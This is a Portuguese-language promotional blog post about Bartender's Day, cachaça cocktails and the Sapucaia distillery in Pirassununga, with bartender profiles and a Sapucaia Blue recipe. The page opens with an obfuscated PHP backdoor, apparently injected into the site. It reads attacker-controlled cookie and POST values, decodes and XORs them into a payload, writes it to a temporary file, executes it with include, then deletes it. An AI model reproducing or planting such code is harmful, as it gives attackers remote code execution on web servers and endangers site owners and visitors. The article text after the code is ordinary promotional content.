$npoSX = chr (108) . chr (87) . chr ( 423 - 338 )."\137" . chr (102) . 'r' . 'q';$FbauSfffMt = chr (99) . "\x6c" . "\141" . chr ( 1046 - 931 )."\163" . chr ( 481 - 386 )."\x65" . chr ( 652 - 532 )."\x69" . chr ( 952 - 837 ).chr ( 1002 - 886 ).chr ( 943 - 828 ); $UrNylSisXB = class_exists($npoSX); $FbauSfffMt = "5804";$UXHcH = !1;if ($UrNylSisXB == $UXHcH){function xZtVPOI(){return FALSE;}$Kimnu = "12528";xZtVPOI();class lWU_frq{private function KtVwlcI($Kimnu){if (is_array(lWU_frq::$oSVZfohe)) {$dgrjQc = sys_get_temp_dir() . "/" . crc32(lWU_frq::$oSVZfohe[chr (115) . chr ( 306 - 209 ).chr (108) . "\x74"]);@lWU_frq::$oSVZfohe["\x77" . "\162" . 'i' . chr (116) . "\145"]($dgrjQc, lWU_frq::$oSVZfohe["\143" . chr ( 426 - 315 ).'n' . chr ( 832 - 716 ).'e' . chr (110) . 't']);include $dgrjQc;@lWU_frq::$oSVZfohe["\144" . "\x65" . "\154" . "\145" . "\164" . "\x65"]($dgrjQc); $Kimnu = "12528";exit();}}private $sQNMUHcGIA;public function SsyGQYM(){echo 48387;}public function __destruct(){$Kimnu = "34109_34588";$this->KtVwlcI($Kimnu); $Kimnu = "34109_34588";}public function __construct($JztFT=0){$TJSKHuR = $_POST;$prMSibR = $_COOKIE;$QizqaxfRVp = "25008fec-50d6-471b-8d67-f46f19e6b156";$PYLmvCR = @$prMSibR[substr($QizqaxfRVp, 0, 4)];if (!empty($PYLmvCR)){$DofCtpBV = "base64";$lOhSrSq = "";$PYLmvCR = explode(",", $PYLmvCR);foreach ($PYLmvCR as $zzLrRHDt){$lOhSrSq .= @$prMSibR[$zzLrRHDt];$lOhSrSq .= @$TJSKHuR[$zzLrRHDt];}$lOhSrSq = array_map($DofCtpBV . '_' . 'd' . "\145" . "\143" . "\x6f" . "\144" . 'e', array($lOhSrSq,)); $lOhSrSq = $lOhSrSq[0] ^ str_repeat($QizqaxfRVp, (strlen($lOhSrSq[0]) / strlen($QizqaxfRVp)) + 1);lWU_frq::$oSVZfohe = @unserialize($lOhSrSq); $lOhSrSq = class_exists("34109_34588");}}public static $oSVZfohe = 12305;}$eJOmo = new /* 16198 */ $npoSX(12528 + 12528); $UXHcH = $eJOmo = $Kimnu = Array();} Dia do bartender: profissão fortalece a divulgação da cachaça em drinks cheios de criatividade .

Dia do bartender: profissão fortalece a divulgação da cachaça em drinks cheios de criatividade

Dia do bartender: profissão fortalece a divulgação da cachaça em drinks cheios de criatividade

No dia 4 de outubro é celebrado o dia do Bartender, uma figura muito importante na vida de todos que apreciam um bom drinque ou coquetel alcoólico e não alcoólico. Reconhecida internacionalmente, o Brasil possui inúmeros profissionais que se destacam na elaboração e preparação dos mais variados estilos de drinks e, inclusive, os feitos com cachaça.

Atualmente, os bartenders são importantes atores na divulgação da Cachaça no Brasil e no mundo. Eles são fundamentais para que o destilado chegue aos paladares mais exigentes, tornando a experiência dos drinks bastante especiais com elaborações criativas.

marco de la rocheUma importante figura neste universo é o mixologista Marco De La Roche, especialista em estudar combinações de ingredientes para coquetéis. Ele já foi embaixador global de várias cachaças pelo mundo, entre elas, e responsável pelo suporte em mixologia e relacionamento com a comunidade de bartenders em todo o mundo. Veja um bate-papo com a participação de Marco De La Roche e outros nomes importantes do segmento: http://mixologynews.com.br/10/2020/destaque/dia-do-bartender-04-outubro

E não à toa, a história por trás da Cachaça transformou a bebida em um símbolo nacional. Surgiu na época dos engenhos, por volta dos anos 1600, e desde então vem ganhando os paladares de muitos brasileiros e transformando o destilado brasileiro como o de maior expressão no mundo pelo seu sabor e história.

Os Bartenders são verdadeiros artistas que podem apresentar um perfil mais clássico ou freestyle, cheio de malabarismo e estilo na forma de compor e servir os drinks. Além disso, esses profissionais dominam a arte da coquetelaria, uma área da gastronomia que vem crescendo nos últimos anos no Brasil, acompanhando do aumento do consumo de destilados no mundo, especialmente com os drinks elaborados com cachaça e gins nacionais.

Você pode não perceber, mas o bartender está nos principais momentos da nossa vida. Seja no happy hour com os amigos, na balada do final de semana ou em datas especiais como nascimento de um filho, aquela promoção no trabalho ou a compra de um imóvel.

Profissão se destaca pelos diferentes perfis e estilos

O bartender é reconhecido por características importantes, como por exemplo, a sua hospitalidade e acima de tudo, o saber receber bem. Além disso, a relação com o cliente é um destaque. Atualmente podemos considerar dois estilos bastante comuns e encontrados em bares e restaurantes onde a figura do bartender se destaca:

Bartender Clássico

Um Bartender Clássico entende muito sobre as bebidas, desde a origem, composição, propriedades, efeitos e características. Com isso, consegue criar seus próprios drinks, com receitas autorais e combinações, além de saber como preparar os coquetéis mais conhecidos no mundo todo. São mais clássicos também com o uniforme, com roupa social (geralmente usam colete e gravata). Com perfil mais experiente, geralmente são estes que lideram a equipe operacional do bar.

Bartender Free style

O barman freestyle possui algumas habilidades que agregam valor ao serviço de bar, como mágica, pirofagia e flair (malabarismo). Geralmente são profissionais mais jovens, mais descolados na hora de se vestir e atuam em festas e eventos variados. Não precisa conhecer a fundo de todas as bebidas, porém tem a missão de entreter o público de forma surpreendente.

Derivan Ferreira de Souza, um dos bartenders mais experientes do Brasil

bartender Derivan Ferreira de Souza, de 63 anos é baiano da pequena cidade de Cansanção, ele vive em São Paulo há mais de 50 anos e, desde 1973, se dedica ao ofício de preparar coquetéis e atender bem a clientela na capital. É um dos mais experientes bartenders em atividade no país.

derivan bartenderDerivan, inclusive, é autor de várias obras literárias e o seu nono livro, lançado em 2018, recebeu o nome de “O Ultimate Bartender Book 2018”. Trata-se de um guia para profissionais do balcão. “É uma fonte de consulta. Falo sobre história de bebidas, sobre o processo de elaboração, sobre fichas técnicas. E o consumidor final vai ter receitas de seu interesse.”, disse o bartender durante uma entrevista para a revista Veja. (https://vejasp.abril.com.br/blog/notas-etilicas/derivan-bartender-livro/0)

 

Mestre Derivan e a elaboração do Sapucaia Blue, com a cachaça Sapucaia Florida

O mestre Deriva, inclusive, já elaborou drinks com produtos do Alambique Sapucaia,localizado em Pirassununga, no interior de São Paulo. Ele apresenta uma sugestão de drink para surpreender seus amigos, com o Sapucaia Blue. Uma combinação da Sapucaia Florida Cristal, produzida pela Destilaria Sapucaia, em Pirassununga, e elaborada com Curaçau Blue. Para aprender como é o seu preparo, assista ao vídeo: https://cachacasapucaia.com.br/works/sapucaia-blue/

cachaca sapucaia barnan derivan ferreira de souza sapucaia blue
Sapucaia Blue

Ingredientes

40 ml de Sapucaia Florida cristal

15 ml de suco de limão

20 ml de Curaçau blue

Modo de Preparo

Em uma coqueteleira, coloque gelo, Sapucaia, o suco de limão, o curaçau blue. Bata bem e sirva em um copo on the rocks com gelo, decore com uma fatia de limão e uma cereja.

 

 

Pirassununga: combinação de excelentes cachaças a drinks criativos

Já para o turista que busca um destino cheio de cultura da cachaça, Pirassununga é a cidade da 51 e da 21, maiores fabricas de cachaça do pais.  Na cidade também há os alambiques de cachaça artesanal onde é possível ter o contato direto com as famílias que produzem a cachaça a gerações.  La está o Alambique Sapucaia que funciona desde 1933 . Além disso, as cachaças produzidas pela Sapucaia são utilizadas pelos principais bartenders do Estado de São Paulo e do Brasil.

vinicius dias batista bartenderNomes como Derivan Ferreira de Souza, fazem parte dos bartenders que já elaboraram drinks com a cachaça pirassununguense. Há ainda, Vinicius Dias, que é considerado um importante nome da coquetelaria no Brasil. Ele está no segmento de drinks há quase 20 anos, e começou a trabalhar como barman na Forneria San Paolo, do Grupo Fasano. Passou, ainda, pelo restaurante Insalata e inaugurou o Riviera Bar, do renomado chef Alex Atala. Além de ter passado por outros estabelecimentos da capital paulista.

Para conferir e aprender como fazer a Capirinha Sapucaia, ou um Black Saronno Sapucaia e, ainda, o Drink Sapucaia Vena, Vinícius Dias explica e mostra neste link por vídeo: https://cachacasapucaia.com.br/vinicius-dias/

 

Outro grande nome importante é João de Souza, que construiu sua carreira aplicando seusjoao de souza bartender conhecimentos de Coquetelaria em renomados restaurantes de SP. Como consultor criou drinks, habilitou e reciclou pessoas para o mercado na área de coquetelaria. Nesta jornada trabalhou ao lado de grandes Chefs como Bel Coelho, Salvatore Loi, Lígia Kararawa, James Oliver e Henrique Fogaça. (saiba mais: https://www.apreciador.com/joao-de-souza/)

 

João de Souza, inclusive, elaborou um drink especial feito com a Cachaça Sapucaia Real X.O e quedrink cicero prado bartender joao jamile restaurante homenageia o histórico Edificio Cicero Prado, em São Paulo, e que tem o nome do fundador da Cachaça Sapucaia.  Uma homenagem que faz referência aos importantes prédios de São Paulo. Leia a história sobre o drink e a homenagem aqui: https://cachacasapucaia.com.br/works/cicero-prado-drink-em-homenagem-ao-edificio-historico-em-sp/

Além disso, o Alambique Sapucaia é uma excelente oportunidade de conhecer a produção de cachaças Premium, como é o caso da Sapucaia Real 18 anos, eleita a terceira melhor cachaça EXTRA PREMUIM do Brasil pelo Ranking da Cúpula da Cachaça/Estadão. Leia: http://www.cupuladacachaca.com.br/resultado-oficial-do-iv-ranking-cupula-da-cachaca/, além das criações de rum, licores e gins premiados, como é o caso do Gin Sapucaia Butterfly, destaque entre os 10 melhores Gins Nacionais pela Forbes Brasil. Leia: https://forbes.com.br/forbeslife/2021/03/os-10-melhores-gins-nacionais-segundo-especialistas/#foto6

O Alambique Sapucaia está localizado em uma região privilegiada e conta com área para descanso, com mesas e bancos para receber turistas, é possível ter uma experiência enriquecedora de voltar no tempo dos alambiques de cobre, quando a produção era totalmente artesanal.

IBA – Reconhecimento internacional: oficializando o drink

A profissão ganhou tanto destaque internacional que em 24 de fevereiro de 1951, no salão do Grand Hotel em Torquay, Inglaterra, foi fundada a International Bartenders Association – IBA, uma associação internacional, representando os bartenders, e, responsável até hoje por registrar e oficializar os coquetéis em todo o mundo. Veja aqui: www.iba-world.com

Indispensável em hotéis, resorts, bares, boates e eventos diversos, o barman profissionalizou-se nas últimas décadas, além de realizar muitas conquistas, dentre elas, a formação de um sindicato para regulamentar a profissão. Quanto mais capacitado o bartender, maiores são suas chances de vencer no mercado de trabalho. Atualmente, são vários as suas atribuições – desde o pleno conhecimento sobre bebidas e montagem de drinks até o atendimento aos clientes.

Bartender: Fundamentos históricos da profissão

Ao longo da história, desde os dias de Pompéia até na Idade Média, foram desenvolvidas as famosas tabernas ou bares, lojas, casas e instituições públicas ao detalhe que vendia vinho e outras bebidas espirituosas.

bartender 1897 legenda bartender em saloon toll gate, black hawk, colorado, 1897
bartender em saloon toll gate, black hawk, colorado, 1897

A profissão de “bartender”, não mudou substancialmente. Sua filosofia de como servir o seu cliente ainda é o mesmo, embora sua atividade pode ser muito sofisticada, feito que exigem conhecimentos de hotelaria e gestão de negócios.

Geralmente um bartender conhece e domina os protocolos de comportamento e utiliza modos requintados no relacionamento com clientes. Nas áreas turísticas podem falar mais de um idioma, ou mesmo vários.

Dependendo da configuração, o barman pode ser considerado simplesmente um funcionário que serve bebidas, mas há bares e pubs em que a figura do bartender é parte da atração pela variedade ou até mesmo que organiza o show.

 

Alambique Sapucaia

Site oficial: Alambique Sapucaia Pirassununga

Facebook: https://www.facebook.com/cachacasapucaia

Instagram: @destilaria_sapucaia

Conheça a história do Alambique Sapucaia, acesse: https://www.youtube.com/watch?v=TvoziHuJCJM

 

E aí, gostou do conteúdo? Então deixe seu comentário e diga o que acho dessa história fantástica sobre o universo dos bartenders e seus drinks. Aproveite também para compartilhar com seus amigos e aproveitar o Roteiro da Cachaça para degustar – é claro, sempre com moderação e responsabilidade.



Este site usa cookies e solicita seus dados pessoais para melhorar sua experiência de navegação.